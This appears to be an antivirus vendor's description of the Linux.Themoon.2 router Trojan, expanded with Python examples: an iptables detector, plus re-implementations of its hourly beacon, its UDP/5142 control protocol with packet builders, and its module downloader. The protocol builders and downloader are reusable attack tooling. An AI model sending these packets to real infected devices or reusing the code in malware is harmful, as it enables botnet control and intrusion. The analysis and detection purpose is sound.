Linux.Themoon.2

Added to the Dr.Web virus database: 2016-09-30

Virus description added:

SHA1: 2b82c715c2f1480b57e59bd7c55ef32db312e008
SHA1: c05bd53f91032f2c8cae509477d760537f014621

A Linux Trojan, also known as “TheMoon”, designed to download further files to the infected device. All examined samples had the file name “.nttpd”. The Trojan stores its PID in the “.nttpd” file, whose contents have the following form:

<pid>,<module_id>

In the head module, module_id equals 17.

Once successfully launched, the Trojan deletes its original file and adds the following iptables rules:

"INPUT -p tcp --dport 8080 -j DROP"
"INPUT -p tcp --dport 443 -j DROP"
"INPUT -p tcp --dport 80 -j DROP"
"INPUT -p tcp --dport 23 -j DROP"
"INPUT -p tcp --dport 22 -j DROP"
"INPUT -s 46.148.18.0/24 -j ACCEPT"
"INPUT -s 185.56.30.0/24 -j ACCEPT"
"INPUT -s 217.79.182.0/24 -j ACCEPT"
"INPUT -s 85.114.135.0/24 -j ACCEPT"
"INPUT -s 95.213.143.0/24 -j ACCEPT"
"INPUT -s 185.53.8.0/24 -j ACCEPT"

The effect is to cut off the device's remote-management ports (SSH, Telnet, HTTP, HTTPS and 8080) so that other Trojans cannot compromise it through those services, while traffic from six hard-coded /24 networks is accepted. Note that whether those networks can still reach the dropped ports depends on the order in which the rules end up in the INPUT chain (appended or inserted), which the description does not state.
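The rule set above is a usable host-based indicator. The following Python script is an added example, not part of the Dr.Web description or the sample; it scans the text of an `iptables-save` dump for the five port drops, the six whitelisted /24 networks and the UDP listener rule described in the net section below, and returns a verdict. The dump it is run on is constructed for the example; the rule spelling with `-m tcp` / `-m udp` is how `iptables-save` normally prints such rules and is handled as optional.

```python
import re

# Ports the Trojan closes and the /24 networks it whitelists (from the rule list above).
THEMOON_DROP_PORTS = {8080, 443, 80, 23, 22}
THEMOON_ACCEPT_NETS = {
    "46.148.18.0/24", "185.56.30.0/24", "217.79.182.0/24",
    "85.114.135.0/24", "95.213.143.0/24", "185.53.8.0/24",
}
THEMOON_UDP_PORT = 5142  # UDP port opened by the net function

# Rule shapes as they appear in iptables-save output ("-m tcp"/"-m udp" is optional).
_DROP_RE = re.compile(r"^-A INPUT -p tcp(?: -m tcp)? --dport (\d+) -j DROP$")
_ACCEPT_RE = re.compile(r"^-A INPUT -s (\d+\.\d+\.\d+\.\d+/\d+) -j ACCEPT$")
_UDP_RE = re.compile(r"^-A INPUT -p udp(?: -m udp)? --dport (\d+) -j ACCEPT$")


def scan_iptables_save(text):
    """Scan an iptables-save dump for TheMoon's firewall footprint.

    Returns a dict with the matched ports/networks, whether the UDP listener
    rule is present, and a verdict: 'themoon', 'suspicious' or 'clean'."""
    dropped, accepted, udp_open = set(), set(), False
    for raw in text.splitlines():
        line = raw.strip()
        m = _DROP_RE.match(line)
        if m:
            dropped.add(int(m.group(1)))
            continue
        m = _ACCEPT_RE.match(line)
        if m:
            accepted.add(m.group(1))
            continue
        m = _UDP_RE.match(line)
        if m and int(m.group(1)) == THEMOON_UDP_PORT:
            udp_open = True

    ports_hit = dropped & THEMOON_DROP_PORTS
    nets_hit = accepted & THEMOON_ACCEPT_NETS
    # Any of the whitelisted C&C networks is a strong indicator on its own; the
    # full set of port drops (or the UDP rule) without them is only suspicious.
    if nets_hit:
        verdict = "themoon"
    elif ports_hit == THEMOON_DROP_PORTS or udp_open:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {
        "dropped_ports": sorted(ports_hit),
        "cnc_nets": sorted(nets_hit),
        "udp_5142": udp_open,
        "verdict": verdict,
    }


# Constructed sample dump (not a real capture) showing an infected router's chain.
SAMPLE_DUMP = """\
# Generated by iptables-save (constructed sample for this example)
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 8080 -j DROP
-A INPUT -p tcp -m tcp --dport 443 -j DROP
-A INPUT -p tcp -m tcp --dport 80 -j DROP
-A INPUT -p tcp -m tcp --dport 23 -j DROP
-A INPUT -p tcp -m tcp --dport 22 -j DROP
-A INPUT -s 46.148.18.0/24 -j ACCEPT
-A INPUT -s 185.53.8.0/24 -j ACCEPT
-A INPUT -p udp -m udp --dport 5142 -j ACCEPT
COMMIT
"""

if __name__ == "__main__":
    print(scan_iptables_save(SAMPLE_DUMP))
```

Run it against `iptables-save` output from the device (`iptables-save | python3 scan.py` with a small `sys.stdin.read()` wrapper); a `themoon` verdict from a router that should have no such whitelist is worth a memory and file-system triage for `.nttpd`.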

The malware then launches three functions that carry out its main malicious activity:

clk
net
dwl

clk

This function launches two child threads. The first counts, in an infinite loop, how long the Trojan has been running. The second connects to the command and control (C&C) server once an hour, iterating over all C&C IP addresses hard-coded in the Trojan's body until it finds a live one. The beacon it sends is a 48-byte buffer of zeros whose first byte is 0x23. The Trojan then waits for a response buffer of the same size. From the received buffer it takes the penultimate DWORD and adds 0x7C558180 to it; the result is used as the current time.
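The check-in exchange in code, as an added example (not code from the sample or from Dr.Web): one function builds the 48-byte beacon, one recovers the time value from a reply the way the clk thread does, and one builds the reply a fake C&C would send so that a sample running in a sandbox computes a chosen time. The description does not state the byte order of the DWORD; big-endian is assumed here, and the arithmetic is kept to 32 bits to match DWORD wraparound.

```python
import struct
from datetime import datetime, timezone

BEACON_LEN = 48
BEACON_MARKER = 0x23
TIME_OFFSET = 0x7C558180        # constant the Trojan adds to the penultimate DWORD
# Assumption: the DWORD is big-endian; the description does not say.
_DWORD = ">I"
_PENULTIMATE = BEACON_LEN - 8   # offset of the second-to-last DWORD


def build_beacon():
    """The hourly check-in: 48 zero bytes with 0x23 in the first position."""
    buf = bytearray(BEACON_LEN)
    buf[0] = BEACON_MARKER
    return bytes(buf)


def is_beacon(data):
    """True if `data` has exactly the shape of the check-in buffer (for IDS use)."""
    return len(data) == BEACON_LEN and data[0] == BEACON_MARKER and not any(data[1:])


def time_from_response(resp):
    """Recover the 'current time' the Trojan derives from a 48-byte reply."""
    if len(resp) != BEACON_LEN:
        raise ValueError("expected %d bytes, got %d" % (BEACON_LEN, len(resp)))
    penultimate = struct.unpack_from(_DWORD, resp, _PENULTIMATE)[0]
    return (penultimate + TIME_OFFSET) & 0xFFFFFFFF


def make_time_response(unix_ts):
    """Build the reply a fake C&C sends so the sample computes `unix_ts`."""
    buf = bytearray(BEACON_LEN)
    struct.pack_into(_DWORD, buf, _PENULTIMATE, (unix_ts - TIME_OFFSET) & 0xFFFFFFFF)
    return bytes(buf)


if __name__ == "__main__":
    # Constructed timestamp: 2016-09-30 00:00:00 UTC, the day the sample was added.
    reply = make_time_response(1475193600)
    ts = time_from_response(reply)
    print(reply.hex(), datetime.fromtimestamp(ts, timezone.utc).isoformat())
```

`is_beacon` is the network-side check: a 48-byte TCP payload that is all zeros apart from a leading 0x23, repeated roughly hourly toward one of the hard-coded C&C addresses, is the behaviour to alert on.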

net

A function that registers additional C&C servers, beyond those hard-coded in the Trojan's body, and receives the data needed to update modules.

The Trojan opens UDP port 5142 with an iptables rule (the %u placeholder is filled in with the port number):

INPUT -p udp --dport %u -j ACCEPT

It then starts a thread that listens on this port and waits for a 263-byte packet with the following structure:

Offset  Data
0x00    Packet size
0x01    Function number (0 or 1)
0x02    Whether a registration confirmation should be sent
0x03    0x8E
0x04+   Packet data

First, the Trojan registers the server upon receiving a packet that looks as follows:

Offset  Data
0x00    0x08
0x01    0x00
0x02    Whether a registration confirmation should be sent
0x03    0x8E
0x04    DWORD with the value 0x6D6163F3

The Trojan saves the value dwIp % 0x64 and the IP address from which the packet was sent. If the byte at offset 0x02 is set, the malicious program sends the same buffer back as confirmation. In addition, the Trojan processes the following control packet:

Offset  Data
0x00    0x0C
0x01    0x00
0x02    Ignored
0x03    0x8E
0x04    DWORD with the value 0x6D6163F3
0x08    Ignored
0x0C    IP address to which the packet is sent

If the DWORD at offset 0x0C is not zero, the Trojan sends a registration request packet to the specified IP. Otherwise, it sends the packet to the server from which the command was received.

A packet with function number 1 (module update) looks as follows:

Offset  Data
0x00    <= 0x14
0x01    0x01
0x02    Ignored
0x03    0x8E
0x04    st_module

The following structure is stored at offset 0x04:

struct st_module
{
  _DWORD dwip;
  _DWORD module_id;
  _DWORD size;
  char filename[8];
};

The Trojan checks that the IP address in this structure is one of the hard-coded or registered server addresses. It then copies the structure into its memory and hands it to the dwl thread.
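The three packet layouts and the net thread's handling of them (registration and echo, control packet and the registration request it triggers, and the module-update packet with st_module that is only accepted from a known server) in one place, as an added Python example that is neither the sample's code nor Dr.Web's. The description leaves several details open, and the code states its assumptions in comments: multi-byte fields are read big-endian, dwip is an IPv4 address stored as a 32-bit integer, the byte at offset 0x00 counts the bytes after the 4-byte header, and the registration request the Trojan itself emits is built with the confirmation byte cleared. Which value “dwIp” in “dwIp % 0x64” refers to is not stated; the sender address is used here. The packets it is exercised with are constructed by the builder functions.

```python
import struct
import ipaddress

PKT_LEN = 263                         # the listener waits for packets of exactly this size
MAGIC = 0x8E                          # constant at offset 0x03
REG_TAG = 0x6D6163F3                  # DWORD at offset 0x04 of registration/control packets
ST_MODULE = struct.Struct(">III8s")   # dwip, module_id, size, filename[8]
# Assumptions (not stated in the description): big-endian fields, dwip is an IPv4
# address as a 32-bit integer, offset 0x00 counts the bytes after the 4-byte header.


def _ip_str(dw):
    return str(ipaddress.IPv4Address(dw))


def _packet(size, func, confirm, payload):
    pkt = bytearray(PKT_LEN)
    pkt[0:4] = bytes([size, func, confirm, MAGIC])
    pkt[4:4 + len(payload)] = payload
    return bytes(pkt)


def build_registration(confirm=1):
    """Registration packet (function 0, size 0x08)."""
    return _packet(0x08, 0, confirm, struct.pack(">I", REG_TAG))


def build_control(target_ip):
    """Control packet (function 0, size 0x0C); target_ip None means 'answer the sender'."""
    target = int(ipaddress.IPv4Address(target_ip)) if target_ip else 0
    return _packet(0x0C, 0, 0, struct.pack(">III", REG_TAG, 0, target))


def build_module(dwip, module_id, size, filename):
    """Module-update packet (function 1, size 0x14) carrying st_module."""
    body = ST_MODULE.pack(int(ipaddress.IPv4Address(dwip)), module_id, size,
                          filename.encode("ascii").ljust(8, b"\0"))
    return _packet(ST_MODULE.size, 1, 0, body)


def parse_packet(pkt):
    """Decode one raw packet into a dict; raises ValueError on anything off-spec."""
    if len(pkt) != PKT_LEN:
        raise ValueError("expected %d bytes, got %d" % (PKT_LEN, len(pkt)))
    size, func, confirm, magic = pkt[0], pkt[1], pkt[2], pkt[3]
    if magic != MAGIC or func not in (0, 1):
        raise ValueError("bad header")
    if func == 0:
        if size not in (0x08, 0x0C) or struct.unpack_from(">I", pkt, 4)[0] != REG_TAG:
            raise ValueError("bad registration/control packet")
        if size == 0x08:
            return {"type": "register", "confirm": bool(confirm)}
        target = struct.unpack_from(">I", pkt, 0x0C)[0]
        return {"type": "control", "target": _ip_str(target) if target else None}
    if size > ST_MODULE.size:                    # description: size <= 0x14
        raise ValueError("module packet too large")
    dwip, module_id, msize, name = ST_MODULE.unpack_from(pkt, 4)
    return {"type": "module", "dwip": _ip_str(dwip), "module_id": module_id,
            "size": msize, "filename": name.split(b"\0", 1)[0].decode("ascii")}


def handle_packet(pkt, sender_ip, state):
    """The net thread's decision logic. state["servers"] holds hard-coded plus
    registered C&C addresses; state["pending_module"] is the slot read by dwl.
    Returns (bytes_to_send, destination_ip), or (None, None) when nothing is sent."""
    msg = parse_packet(pkt)
    if msg["type"] == "register":
        state["servers"].add(sender_ip)
        # "dwIp % 0x64" is stored; which DWORD dwIp is is not stated (sender assumed).
        state["slot"] = int(ipaddress.IPv4Address(sender_ip)) % 0x64
        return (pkt, sender_ip) if msg["confirm"] else (None, None)   # echo = confirmation
    if msg["type"] == "control":
        # Registration request to the named IP, or back to the sender when it is zero.
        return build_registration(confirm=0), msg["target"] or sender_ip
    if msg["dwip"] not in state["servers"]:        # module from an unknown origin: drop
        return None, None
    state["pending_module"] = msg                  # handed to the dwl thread
    return None, None
```

The same `parse_packet` works as a decoder for UDP/5142 traffic captured from an infected device: anything that is 263 bytes long with 0x8E at offset 3 and either 0x6D6163F3 at offset 4 or a function byte of 1 is this protocol.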

dwl

It waits until the net thread fills in the st_module structure. Then it generates the PID file name:

StModule->filename + ".pid"

and, depending on whether this file exists, checks whether the corresponding module is already running, comparing either the module name or its identifier. If the module is running, its process is killed.

After that, the Trojan establishes a TCP connection to StModule->dwip and sends the following line:

StModule->filename,StModule->module_id

The server responds with the module body, which the Trojan saves to the file StModule->filename. The malicious program then sets the file permissions to 448 (octal 0700, owner read/write/execute only) and executes the module.
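The dwl procedure end to end (PID-file check, request line, download, 0700 permissions), as an added Python example that is not the sample's code: an analyst's re-implementation of the client side, with a loopback stub standing in for the C&C so it runs offline. Two deliberate departures from the Trojan: the running-module check only reports the PID instead of killing the process, and the downloaded file is written but never executed. The description gives no TCP port for the download connection, so `DOWNLOAD_PORT` is an assumption and the stub's ephemeral port is used in the demo; the module body is a constructed stand-in.

```python
import os
import socket
import stat
import tempfile
import threading

MODULE_MODE = 0o700     # "448 privileges": 448 decimal == 0o700, owner rwx only
DOWNLOAD_PORT = 8080    # assumption: the description does not give the TCP port


def read_pid_file(path):
    """Parse the '<pid>,<module_id>' PID file format. Returns (pid, module_id) or None."""
    try:
        with open(path) as fh:
            pid_s, mid_s = fh.read().strip().split(",", 1)
        return int(pid_s), int(mid_s)
    except (OSError, ValueError):
        return None


def running_instance(filename, module_id, pid_dir="."):
    """PID recorded in '<filename>.pid' if it names this module and a live process, else None.
    The Trojan kills that process; this only reports it."""
    rec = read_pid_file(os.path.join(pid_dir, filename + ".pid"))
    if rec is None or rec[1] != module_id:
        return None
    pid = rec[0]
    try:
        os.kill(pid, 0)            # signal 0: existence check only
    except ProcessLookupError:
        return None
    except PermissionError:
        pass                       # exists but belongs to another user
    return pid


def module_request(filename, module_id):
    """The line sent over TCP: 'filename,module_id'."""
    return ("%s,%d" % (filename, module_id)).encode("ascii")


def fetch_module(dwip, filename, module_id, dest_dir, port=DOWNLOAD_PORT, timeout=5.0):
    """Connect to dwip, send the request line, store the reply as dest_dir/filename
    with mode 0700. Unlike the Trojan, the file is NOT executed."""
    with socket.create_connection((dwip, port), timeout=timeout) as s:
        s.sendall(module_request(filename, module_id))
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    path = os.path.join(dest_dir, filename)
    with open(path, "wb") as fh:
        fh.write(b"".join(chunks))
    os.chmod(path, MODULE_MODE)
    return path


def serve_stub_module(payload, expected_request):
    """Loopback stand-in for the C&C: one connection, reply with payload only if the
    request line matches. Returns (port, thread, seen) with seen[0] = request received."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    seen = []

    def run():
        conn, _ = srv.accept()
        with conn:
            req = conn.recv(1024)
            seen.append(req)
            if req == expected_request:
                conn.sendall(payload)
        srv.close()

    t = threading.Thread(target=run, daemon=True)
    t.start()
    return port, t, seen


def pidfile_demo(pid_dir=None):
    """Write a PID file for module 17 naming this process; returns (found_self, other_id_ignored)."""
    pid_dir = pid_dir or tempfile.mkdtemp()
    with open(os.path.join(pid_dir, "nttpd.pid"), "w") as fh:
        fh.write("%d,17" % os.getpid())
    return (running_instance("nttpd", 17, pid_dir) == os.getpid(),
            running_instance("nttpd", 3, pid_dir) is None)


def download_demo(dest_dir=None):
    """Round trip against the stub; returns (request_seen, bytes_saved, file_mode)."""
    dest_dir = dest_dir or tempfile.mkdtemp()
    payload = b"\x7fELF" + b"\0" * 60      # constructed stand-in for a module body
    port, t, seen = serve_stub_module(payload, module_request("nttpd", 17))
    path = fetch_module("127.0.0.1", "nttpd", 17, dest_dir, port=port)
    t.join(5)
    with open(path, "rb") as fh:
        data = fh.read()
    return seen[0], data, stat.S_IMODE(os.stat(path).st_mode)


if __name__ == "__main__":
    print(pidfile_demo(), download_demo())
```

Pointing `fetch_module` at a fake C&C you control (with `DOWNLOAD_PORT` adjusted to whatever the live sample connects to) is a quick way to verify that a sandbox's server emulation answers the request line in the form the sample expects.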

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.
